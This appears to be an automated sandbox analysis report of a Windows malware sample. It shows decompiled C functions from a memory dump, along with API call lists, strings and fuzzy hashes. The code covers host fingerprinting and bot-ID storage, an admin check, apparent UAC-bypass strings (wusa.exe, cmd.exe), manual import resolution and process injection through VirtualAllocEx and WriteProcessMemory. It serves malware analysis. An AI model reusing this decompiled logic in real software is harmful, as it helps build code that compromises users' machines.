0x00402b58
0x00402b6a
0x00402b76
0x00402b7c
0x00402ca6
0x00402cad
0x00402cb3
0x00402cbd
0x00402cc7
0x00402ccd
0x00402ce0
0x00000000
0x00402ce0
0x00402b85
0x00402b96
0x00402b98
0x00000000
0x00000000
0x00402ba1
0x00402ba6
0x00402ba7
0x00402bad
0x00000000
0x00000000
0x00402bb3
0x00402bb8
0x00402bbd
0x00402bbf
0x00000000
0x00402bc9
0x00402bd1
0x00402c77
0x00402c77
0x00402c79
0x00402c7f
0x00402bc5
0x00000000
0x00402bc5
0x00000000
0x00402bf3
0x00402c08
0x00402c0c
0x00402c85
0x00402c89
0x00402c93
0x00000000
0x00000000
0x00000000
0x00402c93
0x00402c12
0x00402c1d
0x00402c21
0x00402c25
0x00402c32
0x00402c3e
0x00402c41
0x00402c4a
0x00402c4b
0x00402c5f
0x00402c63
0x00402c69
0x00402c71
0x00402c6b
0x00402c6b
0x00402c6b
0x00402c4d
0x00402c57
0x00402c57
0x00402c73
0x00000000
0x00402c73
0x00402bd1
0x00402bc9
0x00402b8b
0x00402b90
0x00000000
0x00000000
0x00000000
0x00402b90
0x00402c95
0x00402c95
0x00402c9e
0x00402ac3
0x00402ac7
0x00000000
0x00402ac7
0x00000000
0x00402ca4
0x00402ac9
0x00402aae
0x00000000

APIs

GetProcessHeap.KERNEL32(00000000,00001000,00000000,?,73B74F20), ref: 00402A83
HeapAlloc.KERNEL32(00000000,?,73B74F20), ref: 00402A86
socket.WS2_32(00000002,00000002,00000011), ref: 00402AA0
htons.WS2_32(00000000), ref: 00402ADB
select.WS2_32 ref: 00402B28
recv.WS2_32(?,00000000,00001000,00000000), ref: 00402B4A
htons.WS2_32(?), ref: 00402B71
htons.WS2_32(?), ref: 00402B8C
GetProcessHeap.KERNEL32(00000000,00000108), ref: 00402BFB

Strings

ps, xrefs: 00402CC7

Memory Dump Source

Source File: 00000000.00000002.656347159.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.656357047.0000000000414000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: Heaphtons$Process$Allocrecvselectsocket
String ID: ps
API String ID: 1639031587-3878219058
Opcode ID: 0a9a318a9520cdba09dec5fbe0b7d43cc2391f431d6a7511ea18a0acbd49a9c0
Instruction ID: 51c4a8f8372388146ce05ee3fd67d3b8acfed2692fca977a8adbfce498b2b585
Opcode Fuzzy Hash: 0a9a318a9520cdba09dec5fbe0b7d43cc2391f431d6a7511ea18a0acbd49a9c0
Instruction Fuzzy Hash: FB61D271508305ABD7209F51DE0CB6FBBE8FB48345F14482AF945A72D1D7F8D8808BAA

Uniqueness

Uniqueness Score: -1.00%

Function 00401280, Relevance: 30.2, APIs: 9, Strings: 8, Instructions: 417stringCOMMON

Download Yara Rule

APIs

ShellExecuteExW.SHELL32(?), ref: 0040139A
lstrlenW.KERNEL32(-00000003), ref: 00401571

Strings

D, xrefs: 004015C6
useless, xrefs: 0040161E
wusa.exe, xrefs: 00401388
<, xrefs: 00401378
@, xrefs: 00401380
uac, xrefs: 00401628
, xrefs: 00401462
%systemroot%\system32\cmd.exe, xrefs: 00401316

Memory Dump Source

Source File: 00000000.00000002.656347159.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.656357047.0000000000414000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: ExecuteShelllstrlen
String ID: $%systemroot%\system32\cmd.exe$<$@$D$uac$useless$wusa.exe
API String ID: 1628651668-1839596206
Opcode ID: 2389670ef0d52bc0af3abcc9b5081f8297bcd674c671d6a9091d706800eac20c
Instruction ID: 915494465e6448ea0d8334ed2feda226c725056e28db06d0983f622db304c09c
Opcode Fuzzy Hash: 2389670ef0d52bc0af3abcc9b5081f8297bcd674c671d6a9091d706800eac20c
Instruction Fuzzy Hash: E5F19FB55083419FD720DF64C888BABB7E5FB88304F10892EF596A73A0D778D944CB5A

Uniqueness

Uniqueness Score: -1.00%

Function 00401D96, Relevance: 30.0, APIs: 6, Strings: 11, Instructions: 205
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 95%

			E00401D96(void* __ecx, intOrPtr* _a4) {
				struct _OSVERSIONINFOA _v156;
				struct _SYSTEM_INFO _v192;
				char _v196;
				intOrPtr _v200;
				intOrPtr _t59;
				signed int _t61;
				signed int _t63;
				void* _t65;
				intOrPtr _t66;
				intOrPtr _t67;
				signed int _t71;
				intOrPtr _t93;
				intOrPtr _t96;
				intOrPtr _t97;
				intOrPtr _t102;
				intOrPtr* _t103;
				intOrPtr* _t105;
				void* _t109;
				void* _t110;
				void* _t111;
				void* _t112;
				void* _t113;
				void* _t114;

				_t105 = _a4;
				_t102 = 0x64;
				E0040EE2A(__ecx, _t105, 0, _t102);
				_t109 =  &_v200 + 0xc;
				 *_t105 = _t102;
				_v156.dwOSVersionInfoSize = 0x9c;
				if(GetVersionExA( &_v156) == 0) {
					 *((char*)(_t105 + 0x41)) = 0;
				} else {
					 *((char*)(_t105 + 0x41)) = (_v156.dwMajorVersion << 4) + _v156.dwMinorVersion;
				}
				GetSystemInfo( &_v192);
				 *((char*)(_t105 + 0x3f)) = _v192.dwNumberOfProcessors;
				_v196 = 0;
				_t103 = GetProcAddress(GetModuleHandleA("kernel32"), "IsWow64Process");
				if(_t103 != 0) {
					 *_t103(GetCurrentProcess(),  &_v196);
				}
				_t104 = "localcfg";
				 *((char*)(_t105 + 0x40)) = 2;
				_t59 = E0040E819(1, "localcfg", "lid_file_upd", 0);
				_t92 = "flags_upd";
				 *((intOrPtr*)(_t105 + 0x24)) = _t59;
				 *(_t105 + 4) =  *(_t105 + 4) | E0040E819(1, "localcfg", "flags_upd", 0);
				_t61 =  *(_t105 + 4);
				_t110 = _t109 + 0x20;
				if((_t61 & 0x00000008) != 0) {
					 *(_t105 + 4) = _t61 & 0xfffffff7;
					E0040DF70(1, "work_srv");
					E0040DF70(1, "start_srv");
					_t110 = _t110 + 0x10;
				}
				E0040EA84(1, _t104, _t92, 0);
				_t93 = 0;
				_t63 = E0040E819(1, _t104, "net_type", 0);
				_t111 = _t110 + 0x20;
				 *(_t105 + 0x14) = _t63;
				if(E0040199C(_t63) == 0) {
					 *(_t105 + 0x14) =  *(_t105 + 0x14) | 0x00000010;
				} else {
					 *(_t105 + 0x14) =  *(_t105 + 0x14) | 0x00000020;
				}
				_t65 = E0040E819(1, _t104, "born_date", _t93);
				_t112 = _t111 + 0x10;
				 *((intOrPtr*)(_t105 + 0x30)) = _t93;
				if(_t65 == _t93) {
					_t97 = E0040F04E(_t93);
					E0040EA84(1, _t104, "born_date", _t97);
					_t112 = _t112 + 0x14;
					 *((intOrPtr*)(_t105 + 0x30)) = _t97;
					_t93 = 0;
				}
				_t94 = "id";
				_t66 = E0040E819(1, _t104, "id", _t93);
				_t113 = _t112 + 0x10;
				 *((intOrPtr*)(_t105 + 0xc)) = _t66;
				if(_t66 == 0) {
					_v200 = E00401B71();
					E0040EA84(1, _t104, _t94, _t77);
					_t113 = _t113 + 0x10;
					 *((intOrPtr*)(_t105 + 0xc)) = _v200;
				}
				_t95 = "hi_id";
				_t67 = E0040E819(1, _t104, "hi_id", 0);
				_t114 = _t113 + 0x10;
				 *((intOrPtr*)(_t105 + 0x10)) = _t67;
				if(_t67 == 0) {
					_v200 = E00401BDF();
					E0040EA84(1, _t104, _t95, _t74);
					_t114 = _t114 + 0x10;
					 *((intOrPtr*)(_t105 + 0x10)) = _v200;
				}
				 *((intOrPtr*)(_t105 + 8)) = 0x5e;
				_t96 = E0040E819(1, _t104, "loader_id", 0);
				if(_t96 == 0) {
					_t96 = 6;
					E0040EA84(1, _t104, "loader_id", _t96);
				}
				 *((intOrPtr*)(_t105 + 0x1c)) = _t96;
				 *((intOrPtr*)(_t105 + 0x34)) = E004030B5();
				if( *0x41201d == 0) {
					if( *0x41201f == 0) {
						 *(_t105 + 0x18) =  *(_t105 + 0x18) & 0x00000000;
					} else {
						if(E00406EC3() != 0) {
							 *(_t105 + 0x18) = 2;
						} else {
							 *(_t105 + 0x18) = 0x10;
						}
					}
				} else {
					 *(_t105 + 0x18) = 1;
				}
				if(_v196 != 0) {
					 *(_t105 + 0x18) =  *(_t105 + 0x18) | 0x00000200;
				}
				_t71 = GetTickCount() / 0x3e8;
				 *0x412110 = _t71;
				 *(_t105 + 0x28) = _t71;
				return _t71;
			}

0x00401d9f
0x00401da9
0x00401daf
0x00401db4
0x00401dbc
0x00401dbe
0x00401dce
0x00401de0
0x00401dd0
0x00401ddb
0x00401ddb
0x00401de8
0x00401dfc
0x00401dff
0x00401e10
0x00401e14
0x00401e22
0x00401e22
0x00401e2a
0x00401e34
0x00401e38
0x00401e3e
0x00401e46
0x00401e4e
0x00401e51
0x00401e54
0x00401e59
0x00401e64
0x00401e67
0x00401e72
0x00401e77
0x00401e77
0x00401e7f
0x00401e84
0x00401e8e
0x00401e93
0x00401e96
0x00401ea0
0x00401ea8
0x00401ea2
0x00401ea2
0x00401ea2
0x00401eb4
0x00401eb9
0x00401ebc
0x00401ec1
0x00401ec9
0x00401ed3
0x00401ed8
0x00401edb
0x00401ede
0x00401ede
0x00401ee1
0x00401ee9
0x00401eee
0x00401ef1
0x00401ef6
0x00401f01
0x00401f05
0x00401f0e
0x00401f11
0x00401f11
0x00401f16
0x00401f1e
0x00401f23
0x00401f26
0x00401f2b
0x00401f36
0x00401f3a
0x00401f43
0x00401f46
0x00401f46
0x00401f52
0x00401f5e
0x00401f65
0x00401f69
0x00401f72
0x00401f77
0x00401f7a
0x00401f82
0x00401f8c
0x00401f9a
0x00401fb7
0x00401f9c
0x00401fa3
0x00401fae
0x00401fa5
0x00401fa5
0x00401fa5
0x00401fa3
0x00401f8e
0x00401f8e
0x00401f8e
0x00401fc0
0x00401fc2
0x00401fc2
0x00401fd6
0x00401fd9
0x00401fde
0x00401fea

APIs

GetVersionExA.KERNEL32 ref: 00401DC6
GetSystemInfo.KERNEL32(?), ref: 00401DE8
GetModuleHandleA.KERNEL32(kernel32,IsWow64Process), ref: 00401E03
GetProcAddress.KERNEL32(00000000), ref: 00401E0A
GetCurrentProcess.KERNEL32(?), ref: 00401E1B
GetTickCount.KERNEL32 ref: 00401FC9

Part of subcall function 00401BDF: GetComputerNameA.KERNEL32 ref: 00401C15

Strings

hi_id, xrefs: 00401F16, 00401F1B, 00401F33
born_date, xrefs: 00401EAD, 00401ECC
localcfg, xrefs: 00401E2A, 00401E31, 00401E44, 00401E7D, 00401E8C, 00401EB2, 00401ED1, 00401EE7, 00401EFF, 00401F1C, 00401F34, 00401F50, 00401F70
net_type, xrefs: 00401E87
work_srv, xrefs: 00401E5E
flags_upd, xrefs: 00401E3E, 00401E43, 00401E7C
kernel32, xrefs: 00401DF7
IsWow64Process, xrefs: 00401DF2
start_srv, xrefs: 00401E6C
loader_id, xrefs: 00401F4B, 00401F6B
lid_file_upd, xrefs: 00401E25

Memory Dump Source

Source File: 00000000.00000002.656347159.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.656357047.0000000000414000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: AddressComputerCountCurrentHandleInfoModuleNameProcProcessSystemTickVersion
String ID: IsWow64Process$born_date$flags_upd$hi_id$kernel32$lid_file_upd$loader_id$localcfg$net_type$start_srv$work_srv
API String ID: 4207808166-1381319158
Opcode ID: d0281ec4e27c19a57065509444ecf1f2da3960809a548710cb8338c5931bd5af
Instruction ID: b3eca0d4ea79c587a2fa4a56f90b70e38022670634c063da468af4dc7e8924f5
Opcode Fuzzy Hash: d0281ec4e27c19a57065509444ecf1f2da3960809a548710cb8338c5931bd5af
Instruction Fuzzy Hash: 2451EA705043446FD330AF768C85F67BAECEB84708F00493FF955A2292D7BDA95487A9

Uniqueness

Uniqueness Score: -1.00%

Function 00406069, Relevance: 7.6, APIs: 5, Instructions: 121
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00406069(_Unknown_base(*)()* _a4) {
				intOrPtr* _v8;
				signed int _v12;
				struct HINSTANCE__* _v16;
				intOrPtr _t47;
				_Unknown_base(*)()* _t48;
				_Unknown_base(*)()* _t50;
				struct HINSTANCE__* _t52;
				_Unknown_base(*)()* _t53;
				_Unknown_base(*)()* _t54;
				_Unknown_base(*)()* _t55;
				signed int _t56;
				_Unknown_base(*)()* _t59;
				_Unknown_base(*)()* _t62;
				_Unknown_base(*)()* _t63;
				intOrPtr _t69;
				_Unknown_base(*)()* _t76;
				_Unknown_base(*)()* _t77;
				intOrPtr* _t82;
				void* _t85;
				intOrPtr* _t87;
				_Unknown_base(*)()* _t89;

				_t82 = _a4;
				_t47 =  *_t82;
				_t3 = _t82 + 4; // 0x65e85621
				_t69 =  *_t3;
				_v12 = 1;
				if( *((intOrPtr*)(_t47 + 0x84)) != 0) {
					_t85 =  *((intOrPtr*)(_t47 + 0x80)) + _t69;
					_t48 = IsBadReadPtr(_t85, 0x14);
					__eflags = _t48;
					if(_t48 != 0) {
						L29:
						return _v12;
					}
					_t87 = _t85 + 0x10;
					_v8 = _t87;
					while(1) {
						_t50 =  *(_t87 - 4);
						__eflags = _t50;
						if(_t50 == 0) {
							goto L29;
						}
						_t52 = LoadLibraryA(_t50 + _t69);
						_v16 = _t52;
						__eflags = _t52 - 0xffffffff;
						if(_t52 == 0xffffffff) {
							L28:
							_t44 =  &_v12;
							 *_t44 = _v12 & 0x00000000;
							__eflags =  *_t44;
							goto L29;
						}
						_t10 = _t82 + 8; // 0x8bfffffa
						_t53 =  *_t10;
						__eflags = _t53;
						if(_t53 != 0) {
							_t14 = _t82 + 0xc; // 0x28408b06
							_t54 = E0040EBED(_t53, 4 +  *_t14 * 4);
						} else {
							_t11 = _t82 + 0xc; // 0x28408b06
							_t54 = E0040EBCC(4 +  *_t11 * 4);
						}
						 *(_t82 + 8) = _t54;
						__eflags = _t54;
						if(_t54 == 0) {
							goto L28;
						} else {
							_t18 = _t82 + 0xc; // 0x28408b06
							 *((intOrPtr*)(_t54 +  *_t18 * 4)) = _v16;
							 *(_t82 + 0xc) =  *(_t82 + 0xc) + 1;
							_t55 =  *(_t87 - 0x10);
							__eflags = _t55;
							if(_t55 == 0) {
								_t89 =  *_t87 + _t69;
								__eflags = _t89;
								_t76 = _t89;
							} else {
								_t89 = _t55 + _t69;
								_t76 =  *_v8 + _t69;
							}
							_t56 =  *_t89;
							__eflags = _t56;
							if(_t56 == 0) {
								L25:
								__eflags = _v12;
								if(_v12 == 0) {
									goto L29;
								}
								_v8 = _v8 + 0x14;
								_t59 = IsBadReadPtr(_v8 + 0xfffffff0, 0x14);
								__eflags = _t59;
								if(_t59 == 0) {
									_t87 = _v8;
									continue;
								}
								goto L29;
							} else {
								_a4 = _t76;
								_a4 = _a4 - _t89;
								__eflags = _t56;
								do {
									if(__eflags >= 0) {
										_t62 = GetProcAddress(_v16, _t56 + _t69 + 2);
										__eflags = _t62;
										if(_t62 == 0) {
											L21:
											_t63 = _a4;
											__eflags =  *(_t63 + _t89);
											if( *(_t63 + _t89) == 0) {
												_t38 =  &_v12;
												 *_t38 = _v12 & 0x00000000;
												__eflags =  *_t38;
												goto L25;
											}
											goto L22;
										}
										_t77 = _a4;
										__eflags = _t62 -  *(_t77 + _t89);
										if(_t62 ==  *(_t77 + _t89)) {
											goto L21;
										}
										L20:
										 *(_t77 + _t89) = _t62;
										goto L21;
									}
									_t62 = GetProcAddress(_v16, _t56 & 0x0000ffff);
									_t77 = _a4;
									goto L20;
									L22:
									_t89 = _t89 + 4;
									_t56 =  *_t89;
									__eflags = _t56;
								} while (__eflags != 0);
								goto L25;
							}
						}
					}
					goto L29;
				}
				return 1;
			}

0x00406071
0x00406074
0x0040607c
0x0040607c
0x00406082
0x00406087
0x00406099
0x0040609c
0x004060a2
0x004060a4
0x004061b2
0x00000000
0x004061b5
0x004060aa
0x004060ad
0x004060b5
0x004060b5
0x004060b8
0x004060ba
0x00000000
0x00000000
0x004060c3
0x004060c9
0x004060cc
0x004060cf
0x004061ae
0x004061ae
0x004061ae
0x004061ae
0x00000000
0x004061ae
0x004060d5
0x004060d5
0x004060d8
0x004060da
0x004060ee
0x004060fa
0x004060dc
0x004060dc
0x004060e7
0x004060e7
0x00406101
0x00406104
0x00406106
0x00000000
0x0040610c
0x0040610c
0x00406112
0x00406115
0x00406118
0x0040611b
0x0040611d
0x0040612d
0x0040612d
0x0040612f
0x0040611f
0x0040611f
0x00406127
0x00406127
0x00406131
0x00406133
0x00406135
0x0040618b
0x0040618b
0x0040618f
0x00000000
0x00000000
0x00406191
0x0040619e
0x004061a4
0x004061a6
0x004060b2
0x00000000
0x004060b2
0x00000000
0x00406137
0x00406137
0x0040613a
0x0040613d
0x0040613f
0x0040613f
0x0040615e
0x00406164
0x00406166
0x00406173
0x00406173
0x00406176
0x0040617a
0x00406187
0x00406187
0x00406187
0x00000000
0x00406187
0x00000000
0x0040617a
0x00406168
0x0040616b
0x0040616e
0x00000000
0x00000000
0x00406170
0x00406170
0x00000000
0x00406170
0x0040614a
0x00406150
0x00000000
0x0040617c
0x0040617c
0x0040617f
0x00406181
0x00406181
0x00000000
0x00406185
0x00406135
0x00406106
0x00000000
0x004060b5
0x00000000

APIs

IsBadReadPtr.KERNEL32(?,00000014,00000000,?,00000000,?,004064CF,00000000), ref: 0040609C
LoadLibraryA.KERNEL32(?,?,004064CF,00000000), ref: 004060C3
GetProcAddress.KERNEL32(?,00000014), ref: 0040614A
IsBadReadPtr.KERNEL32(-000000DC,00000014), ref: 0040619E

Memory Dump Source

Source File: 00000000.00000002.656347159.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.656357047.0000000000414000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: Read$AddressLibraryLoadProc
String ID:
API String ID: 2438460464-0
Opcode ID: beeb212f6d5b41c5424ed959fb710d65fbebcae36a96b2ee910fcd89165a7e78
Instruction ID: 2c66ad34c3d6fb1da92a891872b73c8746f5f3d5bf62d79dfacd6c24df0475f4
Opcode Fuzzy Hash: beeb212f6d5b41c5424ed959fb710d65fbebcae36a96b2ee910fcd89165a7e78
Instruction Fuzzy Hash: D5418C71A00105AFDB10CF58C884BAAB7B9EF14354F26807AE816EB3D1D738ED61CB84

Uniqueness

Uniqueness Score: -1.00%

Function 00406EDD, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 52
memoryCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E00406EDD() {
				int _v8;
				void* _v12;
				short _v16;
				struct _SID_IDENTIFIER_AUTHORITY _v20;
				signed int _t12;
				int _t15;
				int* _t16;

				_t12 =  *0x412048; // 0x0
				if(_t12 < 0) {
					_v20.Value = 0;
					_v16 = 0x500;
					_t15 = AllocateAndInitializeSid( &_v20, 2, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v12);
					_v8 = _t15;
					if(_t15 != 0) {
						_t6 =  &_v8; // 0x40702a
						_t16 = _t6;
						__imp__CheckTokenMembership(0, _v12, _t16);
						if(_t16 != 0) {
							 *0x412048 = 0 | _v8 == 0x00000000;
						}
						FreeSid(_v12);
					}
					_t12 =  *0x412048; // 0x0
					if(_t12 != 0) {
						_t12 = E00406E36(0x12, 0);
						 *0x412048 = _t12;
					}
				}
				return _t12;
			}

0x00406ee0
0x00406eed
0x00406f06
0x00406f09
0x00406f0f
0x00406f15
0x00406f1a
0x00406f1c
0x00406f1c
0x00406f24
0x00406f2c
0x00406f36
0x00406f36
0x00406f3e
0x00406f3e
0x00406f44
0x00406f4b
0x00406f50
0x00406f57
0x00406f57
0x00406f4b
0x00406f5e

APIs

AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000), ref: 00406F0F
CheckTokenMembership.ADVAPI32(00000000,?,*p@), ref: 00406F24
FreeSid.ADVAPI32(?), ref: 00406F3E

Strings

*p@, xrefs: 00406F1C, 00406F1F

Memory Dump Source

Source File: 00000000.00000002.656347159.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.656357047.0000000000414000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: AllocateCheckFreeInitializeMembershipToken
String ID: *p@
API String ID: 3429775523-2474123842
Opcode ID: e5b07a668181befdfd7487022a30a26c3f8e9f7140bfa863a498fdcbf626812e
Instruction ID: a55d58a6849641b9de595c9770ce5785232f8714219103e6702645194e06a02f
Opcode Fuzzy Hash: e5b07a668181befdfd7487022a30a26c3f8e9f7140bfa863a498fdcbf626812e
Instruction Fuzzy Hash: 6701E571904209AFDB10DFE4ED85AAE7BB8F708304F50847AE606E2191D7745A54CB18

Uniqueness

Uniqueness Score: -1.00%

Function 022365CC, Relevance: 6.1, APIs: 4, Instructions: 67memoryinjectionCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(00000000), ref: 022365DF
VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 022365F9
VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000040), ref: 0223661A
WriteProcessMemory.KERNEL32(00000000,00000000,?,?,00000000), ref: 0223663B

Memory Dump Source

Source File: 00000000.00000002.656635661.0000000002230000.00000040.00000001.sdmp, Offset: 02230000, based on PE: false

Yara matches

Similarity

API ID: AllocVirtual$HandleMemoryModuleProcessWrite
String ID:
API String ID: 1965334864-0
Opcode ID: f6d5bfc494c97751726a91e8fcfc29ef8439432d9fc6ff92f654e37a29c1b935
Instruction ID: 1a8f478e34a5ac0002dd241e533fdeab1fa35af5a9d39285e85f9ce3bb3e0e46
Opcode Fuzzy Hash: f6d5bfc494c97751726a91e8fcfc29ef8439432d9fc6ff92f654e37a29c1b935
Instruction Fuzzy Hash: A51177B1610219BFDB125FA5DC49F9B3FACEB047A9F114024FA09D7254D7B5DD008AA4

Uniqueness

Uniqueness Score: -1.00%

Function 0040637C, Relevance: 6.1, APIs: 4, Instructions: 67
memoryinjectionCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040637C(intOrPtr _a4, void* _a8, intOrPtr* _a12, void** _a16) {
				void* _v8;
				void* _t15;
				void* _t16;
				long _t26;
				struct HINSTANCE__* _t32;
				void* _t37;

				if(_a8 != 0) {
					_t32 = GetModuleHandleA(0);
					_t26 =  *( *((intOrPtr*)(_t32 + 0x3c)) + _t32 + 0x50);
					_t15 = VirtualAlloc(0, _t26, 0x1000, 4);
					_v8 = _t15;
					if(_t15 == 0) {
						L5:
						_t16 = 0;
					} else {
						E0040EE08(_t15, _t32, _t26);
						_t37 = VirtualAllocEx(_a8, 0, _t26, 0x1000, 0x40);
						if(_t37 == 0) {
							goto L5;
						} else {
							E004062B7(_v8, _t37);
							if(WriteProcessMemory(_a8, _t37, _v8, _t26, 0) != 0) {
								 *_a16 = _t37;
								 *_a12 = _t37 - _t32 + _a4;
								_t16 = 1;
							} else {
								goto L5;
							}
						}
					}
					return _t16;
				} else {
					return 0;
				}
			}

0x00406384
0x00406395
0x0040639a
0x004063a9
0x004063af
0x004063b4
0x004063f5
0x004063f5
0x004063b6
0x004063b9
0x004063d0
0x004063d4
0x00000000
0x004063d6
0x004063da
0x004063f3
0x004063fc
0x00406406
0x0040640a
0x00000000
0x00000000
0x00000000
0x004063f3
0x004063d4
0x0040640f
0x00406386
0x00406389
0x00406389

APIs

GetModuleHandleA.KERNEL32(00000000,00000000,00000000,00000000,?,?,00409816,EntryPoint), ref: 0040638F
VirtualAlloc.KERNEL32(00000000,?,00001000,00000004,?,?,00409816,EntryPoint), ref: 004063A9
VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000040), ref: 004063CA
WriteProcessMemory.KERNEL32(00000000,00000000,?,?,00000000), ref: 004063EB

Memory Dump Source

Source File: 00000000.00000002.656347159.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.656357047.0000000000414000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: AllocVirtual$HandleMemoryModuleProcessWrite
String ID:
API String ID: 1965334864-0
Opcode ID: 6b7839f040fb078f737eaa4cdd504cc34e5d0933869709ec770a1cd6c6f8f9ba
Instruction ID: 5c31eb3238d54f8d6ca6dd7d72ba58cabd3ec10295ac0618dae15ec7b9dc1832
Opcode Fuzzy Hash: 6b7839f040fb078f737eaa4cdd504cc34e5d0933869709ec770a1cd6c6f8f9ba
Instruction Fuzzy Hash: B911A3B1600219BFEB119F65DC49F9B3FA8EB047A4F114035FD09E7290D775DC108AA8

Uniqueness

Uniqueness Score: -1.00%

Function 00408E26, Relevance: 4.6, APIs: 3, Instructions: 63
fileCOMMON

Download Yara Rule

C-Code - Quality: 86%

			E00408E26(void* __ecx, void* __edx, long _a4, void* _a8, long _a12, void* _a16, long _a20, DWORD* _a24) {
				char _v12;
				int _t13;
				DWORD* _t14;
				int _t15;
				void* _t20;
				void* _t23;

				_t22 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t20 = CreateFileW(E00402508(0x4129f8,  &E0041076C, 0xe, 0xec64, 0x7bac), 0xc0000000, 0, 0, 2, 0x80, 0);
				E0040EE2A(_t22, 0x4129f8, 0, 0x200);
				if(_t20 == 0xffffffff) {
					_t13 = 0;
				} else {
					_t23 = _a8;
					if(_t23 == 0) {
						E00408DF1( &_v12);
						_t23 =  &_v12;
						_a12 = 8;
					}
					_t14 = _a24;
					 *_t14 = 0;
					_t15 = DeviceIoControl(_t20, _a4, _t23, _a12, _a16, _a20, _t14, 0);
					CloseHandle(_t20);
					_t13 = _t15;
				}
				return _t13;
			}

0x00408e26
0x00408e29
0x00408e2a
0x00408e6c
0x00408e6e
0x00408e79
0x00408ebe
0x00408e7b
0x00408e7b
0x00408e80
0x00408e86
0x00408e8c
0x00408e8f
0x00408e8f
0x00408e96
0x00408e9e
0x00408eab
0x00408eb4
0x00408eba
0x00408eba
0x00408ec4

APIs

CreateFileW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,00000100), ref: 00408E5F
DeviceIoControl.KERNEL32 ref: 00408EAB
CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00408EB4

Part of subcall function 00408DF1: GetSystemTime.KERNEL32(?,004129F8,?,?,00408E8B,?), ref: 00408DFC
Part of subcall function 00408DF1: SystemTimeToFileTime.KERNEL32(?,00408E8B,?,?,00408E8B,?), ref: 00408E0A

Memory Dump Source

Source File: 00000000.00000002.656347159.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.656357047.0000000000414000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: Time$FileSystem$CloseControlCreateDeviceHandle
String ID:
API String ID: 3754425949-0
Opcode ID: 2cf703b3f3d70fe1d21397a344fcfe55e6ffa78bdc2e74738428da1b6bf63eb9
Instruction ID: 6158522553dbc768b3fa764069f531a078bfca64040c8912efb0c234455cb59d
Opcode Fuzzy Hash: 2cf703b3f3d70fe1d21397a344fcfe55e6ffa78bdc2e74738428da1b6bf63eb9
Instruction Fuzzy Hash: CD11C8726402047BEB115F95CD4EEDB3F6DEB85714F00452AF611B62C1DAB9985087A8

Uniqueness

Uniqueness Score: -1.00%

Function 004088B0, Relevance: .1, Instructions: 108
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004088B0(intOrPtr _a4) {
				intOrPtr _t98;
				void* _t99;
				intOrPtr _t101;

				_t101 = _a4;
				E0040EE2A(_t99, _t101, 0, 0x3e0);
				 *((intOrPtr*)(_t101 + 0xc0)) = __imp__#19;
				 *((intOrPtr*)(_t101 + 0xc4)) = __imp__#16;
				 *((intOrPtr*)(_t101 + 0xc8)) = __imp__#23;
				 *((intOrPtr*)(_t101 + 0xcc)) = __imp__#4;
				 *((intOrPtr*)(_t101 + 0xd0)) = __imp__#3;
				 *((intOrPtr*)(_t101 + 0xd4)) = __imp__#21;
				 *((intOrPtr*)(_t101 + 0xd8)) = __imp__#2;
				 *((intOrPtr*)(_t101 + 0xdc)) = __imp__#13;
				 *((intOrPtr*)(_t101 + 0xe0)) = __imp__#1;
				 *((intOrPtr*)(_t101 + 0xe4)) = __imp__#18;
				 *((intOrPtr*)(_t101 + 0xe8)) = __imp__#5;
				_t98 = __imp__#6;
				 *((intOrPtr*)(_t101 + 0x10)) = E00404861;
				 *((intOrPtr*)(_t101 + 0x14)) = E00405B84;
				 *((intOrPtr*)(_t101 + 0x18)) = E00404EF2;
				 *((intOrPtr*)(_t101 + 8)) = 0;
				 *((intOrPtr*)(_t101 + 0xc)) = 0;
				 *((intOrPtr*)(_t101 + 0x1c)) = E004038F0;
				 *((intOrPtr*)(_t101 + 0x20)) = E0040384F;
				 *((intOrPtr*)(_t101 + 0x134)) = E004035A5;
				 *((intOrPtr*)(_t101 + 0x24)) = E00408EC5;
				 *((intOrPtr*)(_t101 + 0x28)) = E00408EFA;
				 *((intOrPtr*)(_t101 + 0x2c)) = E00408F28;
				 *((intOrPtr*)(_t101 + 0x30)) = E00408F53;
				 *((intOrPtr*)(_t101 + 0x34)) = E004022B9;
				 *((intOrPtr*)(_t101 + 0x38)) = E004025B4;
				 *((intOrPtr*)(_t101 + 0x3c)) = E00408F87;
				 *((intOrPtr*)(_t101 + 0x54)) = E0040AD89;
				 *((intOrPtr*)(_t101 + 0x58)) = E0040B211;
				 *((intOrPtr*)(_t101 + 0x5c)) = E0040AEDD;
				 *((intOrPtr*)(_t101 + 0x60)) = E0040F304;
				 *((intOrPtr*)(_t101 + 0x64)) = E0040F428;
				 *((intOrPtr*)(_t101 + 0x68)) = E0040F43E;
